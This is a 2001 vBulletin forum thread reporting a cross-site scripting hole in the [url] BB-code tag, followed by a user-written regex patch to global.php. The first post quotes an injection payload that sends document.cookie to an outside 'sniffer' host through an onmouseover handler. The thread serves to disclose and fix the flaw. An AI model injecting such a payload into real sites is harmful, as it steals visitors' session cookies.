Announcement

Collapse
No announcement yet.

Security problem (javascript in urls)

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Security problem (javascript in urls)

    If you take a look at my signature, you will see an example on javascript in the url vB code tag, that can cause serious security problems. I have only tested this on 1.1.4, but the admins on that board had to close down vB code totally to fix the security problem caused by things like onmouseover="window.open('sniffer.com/script?'+encode(document.cookie));

  • #2
    This is very severe! 1.1.6 is still affected.
    I'm writing my own patch at the moment to stop this one from becoming a disaster.
    Will post it here when i'm done...

    Comment


    • #3
      This is pretty cheesy, but it works:
      Change line 253 of global.php from: [code]$bbcode=eregi_replace("\\[url\\]([^\\[]*)\\[/url\\]","<a href=\"\\1\" target=_blank>\\1</a>",$bbcode);[/code]
      to: [code]$bbcode=eregi_replace("\\[url\\]([^\\\"\\[]*)\\[/url\\]","<a href=\"\\1\" target=_blank>\\1</a>",$bbcode);[/code]
      You'll have to insert the \\\" for the email tags too:
      [code]$bbcode=eregi_replace("\\[email\\]([^\\\"\\[]*)\\[/email\\]","<a href=\"mailto:\\1\">\\1</a>",$bbcode);[/code]
      (a few lines down in global.php)
      Last edited by Matthijs; Tue 17 Apr '01, 1:16pm.

      Comment

      widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
      Working...
      X